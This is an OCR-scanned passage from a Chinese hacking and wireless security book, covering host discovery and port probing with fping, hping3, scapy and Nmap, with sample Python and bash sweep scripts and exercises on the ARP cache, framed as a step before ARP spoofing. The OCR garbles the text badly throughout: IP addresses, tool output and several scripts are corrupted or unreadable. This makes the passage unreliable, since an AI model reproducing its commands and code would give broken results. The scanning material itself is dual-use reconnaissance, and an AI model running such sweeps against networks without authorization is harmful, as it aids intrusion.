默认 为 25ms 一 个 探测 报 文 。 

使 用 fping 工 具 进 行 三 层 扫描 的 操作 步 
又 如 下 : 
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发 送 数据 包 ， 使 用 fping 192.168.1.1 -c 
3 命令 发 送 3 个 数据 包 ， 进 行 信息 探测 ， 执 
行 效 果 如 下 图 所 示 。 


root@kali:~/Test/3# fping 192.168.1.1 -C 3 

192.168.1.1 : [9]，84 bytes，1.61 ms (1.01 avg, 6% loss) 
192.168.1.1 : [1], 84 bytes, 1.24 ms (1.12 avgy, 06% loss) 
192.168.1.1 : [2], 84 bytes, 1.28 ms (1.15 avgyg, 06% loss) 
192.168.1.1 : xmt/rcv/%loss = 3/3/Q%, min/avg/max = 1.01/1.15/1.24 


扫描 一 个 网 段 ， 使 用 fping -g 
192.168.1.1 192.168.1.200 -c 1 命令 ， 可 以 扫 
描 两 个 卫 地 址 之 间 的 一 个 网 段 ， 执 行 效 果 如 
下 图 所 示 。 


rootE@kali:~/Test/3# fping -g 192.168.1.1 192.168.1.209 -C 1 

192.168.1.1 : [90], 84 bytes, 1.16 ms (1.16 avg，8 和 loss) 

192.168.1.101 : [0], 84 bytes, 6.02 ms (0.62 avg, BS Loss) 

ICMP Host Unreachable from 192.168.1.191 Tor ICMP Echo sent to 192.1658.1.3 
ICMP Host Unreachable from 192.168.1.181 for ICMP Echo sent to 192.168.1.2 
ICMP Host Unreachable from 192.168.1.101 for ICMP Echo sent to 192.1686.1.6 
ICMP Host Unreachable from 192.1658,1.191 Tor ICMP Echo sent to 192.1568,.1.5 
ICMP Host Unreachable from 192.168.1.181 for ICMP Echo sent to 192.1568.1.4 


192 .168.1.1 : xmt/rcv/Sloss = 1/1/0%, min/avg/max = 1.16/1.1671.16 
192.168.1.2 : xMt/rcv/%lo0ss = 1/0/180% 
192.168.1.3 : xmt/rcv/%loss = 1/0/180% 
192.168.1.4 : xmt/rcv/Sloss = 170/1605 


使 用 fping -g 192.168.1.1 
192.168.1.200 -c 1 >> atxt 命 令 ， 将 存活 的 主 
机 字段 保存 到 一 个 文件 中 ， 并 通过 cat a.txt 
文本 显示 出 存活 主机 人 信息， 执行 效果 如 下 
图 所 示 。 

root@kali:~/Test/3# cat a.txt 
192.168.1.1 : [0], 84 bytes, 


192.168.1.101 : [6]，84 bytes, 
192.168.1.102 : [6], 84 bytes, 


fping 工 具 支 持 使 用 掩 码 的 形式 赋 
值 地 址 段 ， 使 用 fping -g 192.168.1.0/24 
-C 1 人 命令， 扫描 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:~/Test/3# fping -9 192.168.1.6724 -c 工 
192.168.1.1 : [9], 84 bytes，1.98 ms (1.68 avgy, 0% loss) 
192.168.1.191 : [9], 84 bytes, 9.92 ms (9.g2 avg, 9% 1L055 ) 
192.168.1.1902 : [9], 84 bytes, 14]1 ms (141 avg, 6% loss) 


ICMP Host Unreachable from 192.168.1.161 for ICMP Echo sent to 192.168.1.3 
ICMP Host Unreachable from 192.168.1.161 for ICMP Echo sent to 192.168.1.2 


1.23 ms (1.23 avg, QO% loss) 
0.08 ms (0.08 avg, QO% loss) 
130 ms (136 avg, QO% loss) 


fping 工 具 支 持 从 文件 中 读 取 IP 地 址 
进行 打 描 ， 使 用 fping -f addr 命 令 ， 打 描 
文件 中 给 出 IP 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:~/Test/3# fping -f addr 

192.168.1.]1] 15 alive 

N192.168.1.101 is alive 

ICMP Host Unreachable from 192.168.1.191 for ICMP Echo sent to 192.168.1.2 
ICMP Host Unreachable from 192.168,.1.101 for ICMP Echo sent to 192.168.1.2 
ICMP Host Unreachable from 192.168.1.161 for ICMP Echo sent to 192.168.1.2 
ICMP Host Unreachable from 192.168.1.191 Tor ICMP Echo sent to 192.168.1.2 
192.168.1.2 is unreachable 

92.168.1.106 is unreachable 


4. hping 工 具 


hping 是 一 个 命令 行 下 使 用 的 TCP/IP 数 
据 包 组 装 /分 析 工 具 ， 其 命令 模式 很 像 Linux 


179 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


下 的 Ping 命 令 ， 但 是 它 不 是 只 能 发 送 ICMP 
回应 请 求 ， 它 还 支持 TCP、UDP、ICMP 和 
RAW-IP 协 议 。 

男 外 ，hping 有 一 个 路 由 跟踪 模式 ， 能 

够 在 两 个 相互 包含 的 通道 之 间 传 送 文件 。 

因此 ， 第 被 用 于 检测 网 络 和 主机 ， 其 功能 
非常 强大 ， 可 在 多 种 操作 系统 下 运行 ， 如 
Linux、 FreeBSD、NetBSD、OpenBSD、 

Solaris、MacOs X、Windows 等 。 

该 工具 的 主要 参数 介绍 如 下 : 

e。 -H (-HELP) : 显示 帮助 。 

e -v (-VERSION) : 版 本 信息 。 

e@ -c(--count count) : 发 送 数据 包 的 
次 数 。 关 于 countreached timeout 可 
以 在 hping2.h 里 编辑 。 

e@ -1 (-interval) : 包 发 送 间 隔 时 间 
(单位 是 ms) ， 默 认 时 间 是 1s。 此 
功能 在 增加 传输 率 上 很 重要 ， 在 idle/ 
spoofing 扫 摘 时 此 功能 也 会 被 用 到 。 

e -0 (-nmeric) : 数字 输出 。 象 征 性 
输出 主机 地 址 (用 处 不 大 ) 。 

e -q〈-quiet) : 退出 。 什 么 都 不 会 输 
出 ， 除 了 开始 结束 时 间 。 

© -1 (--interface interface name) : 无 
非 就 是 eth0 之 类 的 参数 。 

e -V (-Vverbose) : 显示 很 多 信息 ， 
TCP 回 应 一 般 如 下 : len=46; 
1p=192.168.1.1; flags=RADF; seq=0: 
ttl]=255: 1d=0: win=0: rtt=0.4ms: tos=0: 
iplen=40; seq=0; ack=1380893304: 
sum=2010; urp=0。 

e -d (-debug) : 进入 debug 模 式 ， 当 
遇 到 麻烦 时 ， 比 如 用 hping 遇 到 一 些 
不 合 习 惯 的 模式 时 ， 你 可 以 用 以 下 
模式 修改 hping, (interface detection 
data link layer access, interface 
settings, ...)。 

e -z(-BIND) : 快捷 键 的 使 用 (可 
按 个 人 喜好 设 定 ) 。 
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e -Z (-unbind) : 消除 快捷 键 。 
该 工具 的 主要 功能 如 下 : 
(1) 防火 墙 测 试 。 
(2) 实用 的 端口 扫描 。 
(3) 网 络 检测 ， 可 以 用 不 同 的 协议 、 
服务 类 型 (TOS) 、IP 分 片 。 
(4) 手工 探测 MTU (最 大 传输 单元 ) 
路 径 。 
(5) 先进 的 路 由 跟踪 ， 文 持 所 有 的 
协议 。 
(6) 远程 操作 系统 探测 。 
(7) 远程 的 运行 时 间 探 测 。 
(8) TCP/IP 堆栈 审计 。 
使 用 hping 工 具 进 行 三 层 扫描 的 方法 
: 使 用 hping3 192.168.1.1 --icmp -c 2 命 
， 可 以 对 目标 卫 进 行 探 测 ， 并 给 出 相应 的 
言 思 ， 执 行 效 果 如 下 图 所 示 。 


ot@kali: g3 192.168.1.1 A -C 
HPING 192. 4 ta bg 192.168.1.1): icmp mode 
=192.168.1.1 ttL=64 jid=54898 i mp seq=@ 1 
er n=46 ip=192.168.1.1 ttL=64 1d=54899 icm Mp_seq= 


EE 


上 ®°" 
一 29 
Ti 
ON 
ao 


--- 192., a : nk statistic --- 
sw d, 2 eceived, B% packet loss 
ind-tr i i ep i = 6.6/6, 和 ms 


另外 ， 用 户 可 以 使 用 for addr in $(seq 
1 234):do hping3 192.168.1.$addr --icmp -c 1 
>> handle .txt &done 命 令 ， 对 一 个 IP 段 的 地 
址 进行 扫描 并 将 结果 保存 到 一 个 文件 中 。 
这 是 因为 该 工具 显示 出 来 的 东西 比较 多 比 
较 杂 ， 上 所 以 建议 保存 到 一 个 文件 当中 再 进 
行 查 看 。 


(名 提示 : 使 用 cat handle.txt | grep len | cut -d 


""_f2 | cut -d "=" -f 2 命令 ， 可 以 将 文本 中 
存活 主机 的 了 PP 信息 提取 出 来 。 


10.4 ”四 层 扫描 


四 层 扫描 的 优点 是 结果 可 靠 ， 而且 
不 会 被 防火 墙 过 小 ， 甚 至 可 以 发 现 所 有 端 
口 都 被 过 滤 的 主机 ， 缺 点 是 基于 状态 过 滤 
的 防火 墙 可 能 过 滤 扫 描 ， 且 全 问 口 扫 朱 速 


度 慢 。 四 层 扫 描 是 基于 TCP、UDP 协 议 来 进 
行 的 。 


10.4.1 TCP 扫 摘 


TCP (Transmission Control Protocol， 
传输 控制 协议 ) 是 一 种 面向 连接 的 、 可 靠 
的 、 基 于 字 节 流 的 传输 层 通 信 协 议 ， 由 
IETF 的 RFC 793 定 义 ， 在 简化 的 无 线 网 络 
OSI 模型 中 ， 它 完成 第 四 层 传输 层 所 指定 的 
功能 。 

在 因特网 协议 族 (Internet protocol 
suite) 中 ，TCP 层 是 位 于 IP 层 之 上， 应 用 层 
之 下 的 中 间 层 。 不 同 主机 的 应 用 层 之 间 经 
币 需 要 可 靠 的 、 像 管道 一 样 的 连接 ， 但 是 卫 
层 不 提供 这 样 的 流 机 制 ， 而 是 提供 不 可 靠 
的 包 交 换 。 

TCP 通 信和 需要 建立 3 次 握手 ，TCP 的 3 次 
握手 示意 图 如 下 。 


一 一 一 客户 端 服务 器 
建立 TCB 
建立 TCB 波动 打开 


主动 打开 


TCP 探 测 主机 的 原理 有 如 下 两 条 。 

(1) 未 经 请 求 直 接 发 送 ACK 数据 包 ， 
通常 情况 下 主机 会 回复 RST 数据 包 。 

(2) 正常 请 求 发 送 SYN 请 求 数据 包 ， 
如 果 端 口 开 放 会 回复 SYN/ACK 数据 包 ， 如 
果 端 口 没有 开放 回复 RST 数据 包 。 

使 用 scapy 工 具 进 行 TCP 扫 描 的 操作 步 
又 如 下 : 
step 回 通过 scapy 构 建 TCP 数 据 包 ， 使 用 
i=IP(): i.dst="192.168.1.1": idispalyO 命 令 ， 
执行 效果 如 下 图 所 示 ， 可 以 看 到 修改 了 IP 字 
段 的 目的 卫 地 址 。 
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>>> 1i=IP() 
P>> i.dst="]192.15658.1.1" 
p>> i.display!) 
梁 认 六 [ IP ]#### 
version= 4 
ihl= None 
tos= OQx0 
len= None 
ids 1 
nt 
trag= 日 
ttl= 64 
proto= hopopt 
chksum= 0 ne 
sre= .1683.1.181 
dst= 1 192.168.1.1 
\options\ 


通过 t=TCP(); t.flags='A'; t.display() 
命令 ， 可 以 修改 TCP 数 据 包 的 发 送 类 型 为 
ACK 数 据 包 ， 执 行 效果 如 下 图 所 示 。 


>>> t=TCP() 

>>> t.flags='A' 
>>> t.display() 

嵌 ## 关 [了 TCP ]##### 
sport= ftp data 


dport= http 
seq= 0 
ack= 0 


dataofs= None 
reserved= 0 
flags= A 
window= 8192 
chksum= None 
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urgptr= 
options= [] 


使 用 [=(i/t).display0 命 令 ， 可 以 将 人 P 包 
与 TCP 包 组 合 ， 并 查看 数据 包 结 构 ， 执 行 效 
果 如 下 图 所 示 。 


E>> r=(i/t).display() 


玉 关 者 [。 工 P ] # 才 ## ###[ TCP ]### 
version= 4 sport= ftp data 
ihl= None dport= http 
tos= DOX0 seaq= 0 
len= None ack= 0 
id= 1 dataofs= None 
Tlags= reserved= 0 
frag= 9 flags= A 
ttl= 64 window= 6192 
proto= tcp chksum= None 
chksum= None urgptr= 0 
src= 192.168.1.101 options= [] 
dst= 192.168.1.1 
\OpTions\ 


使 用 命令 a=srl(r).dispaly0 〇 命令 ， 将 数 
ee 查看 返回 数据 包 内 容 ， 执 
行 效果 如 下 图 所 示 。 


>> i=IP!() 

> dst="192.168.1.1" 

>>> t=TCP() 

>>> tt.flags='A’ 

>>> r=(i/t) 

>> a=srl(r).dispaly!() 

puoin emission: 

:Enel sending 1 packets. 


和 2 packets, got 1 answers, remaining © packets 


#[ IP ]#### 大 齐 #[ TCP  ] 浊 天 检 
version= 4 sport= http 
ihl= 5 dport= ftp data 
tos= BXxQ seg= 日 
len= 48 ack= 0 
id= 56417 dataofs= 5 
flags= reserved= 0 
frag= 6 flags= R 
ttl= 64 window= 日 
proto= tcp chksum= gx2bc6 
chksum= Ox1ab8 urgptr= 日 

src= 192.168.1.1 options= [] 
dst= 192.168.1.161 #W#[ Bee lH 
\option 四 Load= '\xQ0\xQO\x0O\x00\x00‘\x00 
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人 @ 注 意 : 使 用 “; ”符号 结 来 语句。 该 语 
句 为 一 条 单独 语句 ， 为 了 便于 区 分 特别 加 入 
加 了 分 号 《在 代码 中 是 没有 分 号 的 ) 。 


TCP(dport=80,flags='A'),timeout=0.1). 
display()， 执 行 效 有 果 如 下 图 所 示 。 


>>> aI=SrIUIPUdSst="I932.I585.I.I JJATCPUIdport=55,TUags= A ),timeout=6.1].disptlay(] 
Begin emission: 

Finished sending 1 packets. 
A 


Received 1 packets, got 1 answers, remaining B packets 
岩 检 帮 [ IP ]### 六 和 和 [ FCP ]### 

version= 4 sport= http 

dport= ftp data 

tos= Ox0 seg= 0 

ack= 日 

dataofs= 5 


proto= tcp 
chksum= Ox1899 
src= 192.168.1.1 options= [] 

dst= 192.1686.1.101 ##y#[ Padding ]### 

\options\ load= '\x80\x00\xO0\xOO\xdO\xO0 


下 面 编 辑 一 个 python 脚 本 ， 来 实现 四 层 
TCP 自 动 扫描 ， 具 体 代码 如 下 : 
#!'/usr/bin/python 


Import logging 
import subprocess 


logging.getLogger("scapy.runtime"). 
setLevel (lo0ogging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) !=2: 
print"Usage /TCP SCAN DY [/24 
network address]" 
print"Example 
由 号 人 
print "Example will perform a TCP 
ACK Ping scan of the 192.168.1.0/24 
range”" 
SYS .exit() 
address = str(sys. 
# 定 义 一 个 变量 , 将 参数 赋值 给 地 址 变量 
# 使 用 分 割 函数 分 割 出 IP 地 址 的 前 三 段 
pretis— address sol 
i ES SR Rn i og = i Rs We wl 
LI address Spill oe FZiI 
Pa 


./TCP SCAN.py 


rn 


BoP 
# 使 用 for 循 环 遍历 整个 网 段 
# 构 造 发 送 TCP 数 据 包 
response = Srl(IP(dst=prefix+str 
(addr)) /TCP (dport=80, flags='A'),timeout= 
0.1,verbose=0) 
# 异 常 处 理 
if int (response[TCP] .fags) == 4: 
# 如 果 返 回 的 数据 包 是 Reset 的 数据 包 ， 认 为 存活 


print prefix+str (addr) 


LEY 
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# 将 存活 主机 打印 输出 
ee 
pass 


10.4.2 UDP 扫 摘 


UDP (User Datagram Protocol， 用 户 数 
据 报 协议 ) 是 OSI (Open System Intercon- 
nection， 开 放 式 系统 互联 ) 参考 模型 中 一 
种 无 连接 的 传输 层 协议 ， 提 供 面 同事 务 的 
简单 不 可 靠 信息 传送 服务 。 

UDP 探测 主机 的 原理 为 : 当 客户 端 向 
目标 主机 发 送 一 个 UDP 请 求 时 ， 如 果 目 标 
主机 开放 了 此 端口 ， 不 会 做 出 任何 啊 应 ， 
如 果 该 主机 没有 开放 此 端口 ， 会 回复 一 个 
端口 不 可 达 信 息 。 

使 用 scapy 工 具 进 行 UDP 扫描 的 操作 步 
又 如 下 : 
查看 UDP 数据 包 结 构 ， 使 用 u= 
UDP(); u.display() 命 令 ， 执 行 效果 如 下 图 
所 示 。 


>>> i=IP() 

>>> U=UDPI( ) 

>>> U.display!() 
天 ## 关 [UDP  ] 大 #### 
sport= domain 
dport= domain 
len= None 
chksum= None 


查看 完整 UDP 数 据 包 结构 ， 使 用 r=(i/ 
u).display0 命 令 ， 执 行 效果 如 下 图 所 示 。 


p>> r=(i/Uu).display() 

洗 庆 大 [ 工 P ] 大 术 基 。 溺 帮 大 [UDP ]# 兴 ## 
version= 4 sport= domainl 
ihl= None dport= domain 


tos= Ox0 len= None 
len= None chksum= None 
id= 1 

flags= 

frag= 0 

ttl= 64 

proto= udp 


chksum= None 
src= 127.0.0.1 
dst= 127.0.0.1 
NODLLIOTSAN 


使 用 r[IP].dst="192.168.1.1" 命 令 修改 

目标 JP 地址 ， 使 用 r[UDP].dport=6666 命 令 
修改 目标 端口 ， 使 用 rdisplayO 命 令 查看 修 
改 后 的 数据 包 ， 执 行 效 果 如 下 图 所 示 。 


P>> rlIIP]T.dsSt="192.168.1.1"™ 
p>> Fr[UDP] .dport=6666 

F>> r.display() 

涯 ##[ IP ]### 大 形 ## 关 [UDP ]#### 
version= 4 sport= donain 
ihl= None dport= 6666 
tos= DX9 len= None 
len= None chksum= None 
id= 1 

flags= 

frag= 0 

ttl= 64 

proto= udp 

chksum= None 

Src= 192.166.1.101 

dst= 192.168.1.1 

\options\ 


使 用 srl(r,timeout=1).display() 命 令 发 
送 数 据 包 并 查看 返回 结果 ， 执 行 效果 如 下 
图 所 示 。 


E>> srl(r,timeout=1).displayl) 

Begin emission: 

.Finished sending 1 packets. 

比 

Received 2 packets, got 1 answers, remaining 0 packets 

岩 ##[ 工 P ]# 检 并 ###¥[| IP In ICMP |]### 

version= 4 version= 4 

ihl= 5 ihl= 5 

tos= xO tos= Ox0 

len= 56 len= 28 

id= 161 id= 1 

flags= flags= 

fradg= 0 frag= 日 

ttl= 128 ttl= 64 

proto—- icmp Proto=- udp 

chksum= OQxb607 chksum= 0xf6b3 
src= 192.168.1.103 src= 192.168.1.101 
dst= 192.168.]1.101 dst= 192.168.1.103 
\options\ \options\ 

央 # 江 [ ICMP  ] 六 ### ###¥#[ UDP In ICMP ]### 
type= dest-unreach sport= domain 
code= port-unreachabl, dport= 6666 
chksum= QOXx8133 len= 8 
reserved= 0 chksum= Dx6182 
Length= 0 
nexthopmtu= 0 


人 阅 提 示 : 如 果 目 标 主机 没有 开放 相应 的 端 
口 ， 会 返回 一 个 目标 不 可 达 消 息 ， 但 是 也 
有 个 别 设 备 不 会 响应 这 类 数据 包 ， 为 了 避 
免 一 直 等 待 ， 可 以 加 入 超时 检测 指令 。 


使 用 一 条 命令 可 以 完成 UDP 扫 
描 ， 该 命令 为 Sr1(P(dst="192.168.1.103"/ 
UDP(dport=6666)).display()， 执 行 效果 如 下 
图 所 示 。 


F>> Srl(llIP(ldst=" 192.168.1.193" J7UDP(dpOrT=6666)).disptlay(] 


Begin emission: 

.Finished sending 1 packets. 

kk 

Received 2 packets, got 1 answers, remaining 9 packets 

由 ##[ IP ]### ###[ IP in ICMP ]### 

version= 4 version= 4 

ihl= 5 ihl= 5 

tos= Ox0 tos= Ox0 

len= 56 len= 28 

id= 163 id= 1 

flags= flags= 

trag= 0 frag= 0 

ttl= 128 ttl= 64 

proto= icmp prOLO= udb 

chksum= 9xb605 chksum= QOxf6b3 
src= 192.168.1.103 src= 192.168.1.101 
dst= 192.168 .1.101 dst= 192.168.1.103 
\options\ \options\ 

震 ###[ 工 CMP ]#### ###[ UDP In ICMP ]### 
type= dest-unreach sport= domain 
code= port-unreachable dport= 6666 
chksum= Dx8133 len= 8 
reserved= 0 chksum= 9x6182 
Length= 0 
nexthopmtu= 0 
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下 面 编辑 一 个 python 脚 本 实现 四 层 UDP 
自动 扫描 ， 具 体 代 码 如 下 : 


#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (lo0ogging .ERROR) 

from scapy.all import * 

if len(sys.argv) !=2 : 

print"Usage .。 ./UDP SCAN.py [/24 
network address]" 

print" "Example s “IUDP SCAN< DY 
是 

print "EXample will perform a TCP 
ACEK Ping scan of the 192.168.1.0/24 
Tange” 

Sys.exit () 

address = Str(SYS -argv[1]) 

BreTr Tt address pTIE( 
I eg I 
下 

for addr in range(1,254): 

# 循 环 遍 历 整 个 IP 地 址 段 

# 构建 UDP 数据 包 ， 设 置 超时 时 间 ， 不 查看 错误 信息 

response = srl(IP(dst=prefix+str 
(addr) ) /UDP (dport=6666) ,timeout=0.1,verb 
ose=0) 
LE 
if Int(reSsponse[IP] .Proto) == 1: 

#IP 的 上 层 协 议 如 果 是 1 ( ICMP ) 认为 是 有 数据 返回 

print prefix+str (addr) 

# 将 存活 主机 IP 地 址 打印 出 来 

SexeenDes 
pass 


10.4.3 ”工具 扫 摘 


使 用 Namp、hping3 等 工具 可 以 进行 四 陋 肥 小 
层 扫描 。 


1. Nmap 工 具 


Nmap 工 具 在 四 层 扫描 的 功能 还 是 非常 
强大 的 ， 使 用 的 具体 操作 步骤 如 下 : 
使 用 Nmap 113.105.151.1-100 -PU666 
-Sn 命令 ， 可 以 实现 UDP 扫描 ， 执 行 效 果 如 
下 图 所 示 。 


Foot@kali:-# nmap 192.168.1.1-1006 -PU666 -sn 

starting Nmap 7.76 ( https://nmap.org ) at 2018-16-26 63:51 EDT 
Nmap scan report for 192.168.1.1 

Host is Up (6.090715 latency). 

MAC Address: 1C:FA:68:@1:2F:88 (Tp-Link Technologies) 

Nmap scan report for 192.168.1.106 

Host is up (6.090185 Latency ) ， 

MAC Address: 60:25:22:F9:5F:44 (ASROCK Incorporation) 

Nmap done: 166 IP addresses (2 hosts up) scanned in 3.95 seconds 
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使 用 Nmap 192.168.1.1-100 -PA666 -sn 
命令 ， 可 以 实现 TCP 扫 描 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:~# nmap 192.168.1.1-100 -PA666 -sn 

starting Nmap 7.790 ( https://nmap.org ) at 2018-10-26 03:53 EDT 
Nmap scan report for 192.168.1.1 

Host is Up (9.09084s Latency1 . 

MAC Address: 1LC:FA:68:61:2F:08 (Tp-Link Technologies) 

Nmap scan report for 192.168.1.100 

Host is up (0.09018s Latency1 . 

MAC Address: 00:25:22:F9:5F:44 (ASRock Incorporation) 


Nmap done: 109 IP addresses |2 hosts up) scanned in 2.35 seconds 


在 打 描 上 ，Nmap 不 局 限于 -PU 与 -PA 
两 个 参数 ， 还 有 其 他 参数 。 具 体 的 参数 信 
息 如 下 图 所 示 。 


HOST DISCOVERY: 

-SL: List Scan - simply List targets to scan 

-5n: Ping Scan - disable port scan 

-Pn: Treat all hosts as online -- skip host discovery 
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
-PO[protocoL list]: IP Protocol Ping 

-Nn/-R: Never do DNS resolution/Always resolve [default: sometimes] 
--dns-servers <serv]l[,serv2],...>: Specify custom DNS servers 
--System-dns: Use 0S's DNS resolver 

--traceroute: Trace hop path to each host 


税 提 示 : 当然 也 可 以 采用 地 址 列表 导入 
的 形式 进行 四 层 扫 描 ， 该 命令 为 Nmap -1L, 
addr.txt -PA80 -sn。 


2. hping3 工 具 


使 用 hping3 工 具 可 以 进行 四 层 扫描 ， 具 
体操 作 步 又 如 下 : 
使 用 hping3 192.168.1.103 --udp -c 1 命 
令 ， 可 以 对 该 地 址 实现 基于 UDP 的 扫描 ， 
执行 效果 如 下 图 所 示 。 


root@kali:-# hping3 192.168.1.103 --udp -c 1 

HPING 192.168.1.103 (eth6 192.168.1.193): udp mode set, 28 headers + 0 data bytes 
ICMP Port Unreachable from ip=192.168.1.1983 name=UNKNOWN 

status=Q port=1586 seq=9 


-- 192.168.1.193 hping statistic --- 
1 packets transmitted, 1 pacxets received, B85 packet loss 
round-trip min/avg/max = 29.7/29.7/29.7 ms 


下 面 给 出 一 段 基 于 UDP 的 shell 脚 本 ， 
使 用 该 脚本 可 以 自动 进行 UDP 扫 描 ， 具 体 
代码 如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ] ;then 
achy Usage — hping udp sh IAA2 
network address]" 
eeho 上 xcCample — /hping undp sh 
有 
echo "Example will perform a UDP 
Ping SWeep of the 192.168.1.0/24 network 
and output to -an output.txt file™ 


exit 
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fi 
Ereliz=S(echo Sil cuE =d "ee" =E 1 3 
# 去 除 IP 地 址 前 三 段 
for adqr jin $(seq 1 200);do 
# 使 用 循环 遍历 1-200 
hping3 oprehz sagar Udp Cc 1%> 
r.txt  # 将 结果 保存 到 r .txt 文 件 当 中 


done 


# 使 用 grep 过 滤 出 存活 主机 的 TP 地址， 将 其 保存 
到 output .txt 文 件 中 

grep Unreachable rT.txt | cut =d 
ea RR | WO 1 et 3 

rm r.txt  # 人 删除 临时 文件 


使 用 hping3 192.168.1.103 -c 1 命令 ， 
可 以 对 该 地 址 实现 基于 TCP 的 扫描 ， 执 行 效 
果 如 下 图 所 示 。 


oot@kali:-# hping3 192.168.1.193 -c 1 | 
PING 192,.168.1.163 (ethB 192.168.1.163): NO FLAGS are set, 48 headers + 0 data bytes 
en=46 ip=192.168.1.183 ttl=]28 id=17@ sport=@ flags=RA seq=@ win=8 rtt=7.8 ms 


-- 192.168.1.193 hping statistic --- 
packets transmitted, 1 packets received, g% packet loss 
ound-trip min/avg/max = 7.8/7.8/7.8 ms 


下 面 给 出 一 段 基于 TCP 的 shell 脚 本， 使 
用 该 脚本 可 以 自动 进行 TCP 扫 描 ， 具 体 代 码 
如 下 : 


#!/bin/bash 
if [ "S$#" -ne 1 ];then 
Echo Usage — hping tenssh ly 


network address]" 
ECG Excample® holing ton sn 
二 号 ER 
echo “EXample will perform a TCP 
Ping SWeep of the 192.168.1.0/24 network 
and output to an output.txt ile”™ 
exit 
fi 
prebDs=s(echo SI RUE 9 ”FF 1 3) 
# 去 除 IP 地 址 前 三 段 
tor addr in Stseq 1 200}) ;7do 
# 使 用 循环 遍历 1-200 
hping3 Sprehx.Saddr ~c 1 >> r,txt 
# 将 结果 保存 到 r .txt 文 件 当 中 
done 
# 筛选 出 以 1en 开 头 的 字段 ， 并 保存 到 outpnut . 
txt 文 件 中 
RE 
el Bh ee ed ee a 


# 删 除 临时 文件 


Tn 


全 注意 : hping3 工 具 在 发 送 TCP 数 据 包 时 与 


其 他 工具 不 同 ， 它 发 送 的 TCP 数 据 包 flags 字 
段 全 部 都 是 0， 如 下 图 所 示 。 


~ Transmission control Protocol, Src Port: 2552, Dst Port: 0, Seq: 1, Len: 9 
Source Port: 2552 
De stination Port: © 
[Stream index: 4] 
[TCP Segment Len: @] 
Seguence number: 1 (rel atlv e Sequence number | 
[Next Segquence Number:; 1 relative Sedquence number )] 
» Acknowledgment number: 134312884 
g161 ,,,，= Header Length: 29 bytes (5) 
r Flags: OxOQ00 (<None>) 
O00. .... .... = Reserved: Not set 
‘0 .= Nonce: Not set 
.ge...，.,,， = Congestion Window Reduced {CWR):; Not set 
su ss ECN-Echo: Not Set 
ss 和 目 。 。。。。 Urgent: Not Set 
= t: Not set 
Ee = Push: Not set 
. .0.. = Reset: Not set 
= Syn: Not set 
.8 = Fin: Not set 


[TcP Flags 


在 扫描 完成 后 ， 如 果 主 机 存活 会 回复 
一 个 ACK+RST 的 数据 包 ， 回 复数 据 包 格 式 
如 下 图 所 示 。 


Source Port: 6 
Destination Port: 2599 
[Stream index: B] 


[TCF :gment Le BD] 
:EE Number: 1 人 LVe Sequence number) 
[Next sequence number: 1 relative sequence number)] 
Radinmalinlont number; 1 (relative ack number) 
9161 = Header Length; 26 byt 5 
De Reserved: Not s 
Nonce:; Not 
Congestion Wind Red | (CWR) t 
ECN-Echo: Not 
LD Urgent: Not set 
1 = ACcknowledgm Set 
0 Push; Not set 


oi a ER 
[TCP Flags: :+*:*.:*:A:R..:] 


有 练 1 一 一 查看 系统 中 的 ARP 缓 存 表 


在 利用 网 络 欺 骗 攻 击 的 过 程 中 ， 经 党 
用 到 的 一 种 欺骗 方式 是 ARP 欺 骗 ， 但 在 实 
施 ARP 欺 骗 之 前 ， 需 要 查看 ARP 绥 存 表 。 那 

么 如 何 查 看 系统 的 ARP 绥 存 表 信息 呢 ? 

具体 的 操作 步骤 如 下 : 
右 击 “开始 ”按钮 ， 在 弹出 的 快捷 
red 择 “ 运 行 ” 菜 单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “打开 ”文本 框 中 输入 cmd 
Hy 如 下 图 所 示 。 


3 运行 x 


10.5 
实战 演 


j 可 Windows 将 根据 你 所 输入 的 名称 ， 为 你 打开 相应 的 程序 . 
-3 文件 夹 、 文 栏 或 Internet 资源 。 


浏 谢 (B)… 


[step 较 单 去 “确定 ”按钮 ， 打 开 “ 
符 ” 窗 口 ， 如 下 图 所 示 。 


命令 提示 


ny 


第 10 章 ”从 无 线 网 络 渗透 内 网 


BN C:\windows\system32\cmd,exe 一 口 X 
R 本 10. 0. 10586] 
保密 所 有 权利 。 


Lorporatione 


\Administrator2, 


在 “命令 wll 窗口 中 输入 arp -a 
给 Fi 按 Enter 键 执行 命令 ， 即 可 显示 出 
本 机 系 py 的 内 容 ， 如 下 图 
所 示 。 
Ci\windows\system32\cmd.exe - 0O x 


R 本 10. 0. 10586] 
2015 Jicrosoft Corporation。 人 保留 所 有 相逢 
CL: ‘Users\Admnistrator arp -a 
|: 192. 168. 0. 105 --- OxS 

Internet 地址 物理 地 址 

1 f4-83-cd-33-60-73 
ad be 60 16 Ta al 
40-a5-ef-de-a9-d: 


-60-00-9c-cc-dl 


在 “命令 提示 符 ” 窗 口中 输入 arp -d 
AR 按 Enter 键 执行 命 Ne 即 可 删除 ARP 
和 


BC:\windows\system32\cmd.exe 一 口 X 


224. 0. 0. 251 1-00-5e-00-00-ftb 


dd 4 0. 0. 4592 1-00-Se-00-00-fc 


1]1-00-be-i1f-ff-fa 
J1-UU-ve | 


有 < 下 在 + Ff + 


L: ‘Users\Admnistrator>arp -d 


dministrator, 


实战 壮 
目 己 


如 果 不 想 让 别人 在 “网 络 邻 大 ”中 看 
到 目 己 的 计算 机 ， 则 可 把 自己 的 计算 机 名 


练 2 一 一 在 “网 络 邻 居 ”中 隐藏 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


称 在 “网 络 邻 天” 里 隐藏 ， 具 体 的 操作 步 
骤 如 下 : 

右 击 “开始 ”按钮 ， 在 弹出 的 快捷 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “打开 ”文本 框 中 输入 
regedit 命 令 ， 如 下 图 所 示 。 


画 运行 xX 


Windows 将 根据 你 所 输入 的 名 称 ， 为 你 打开 相应 的 程序 、 
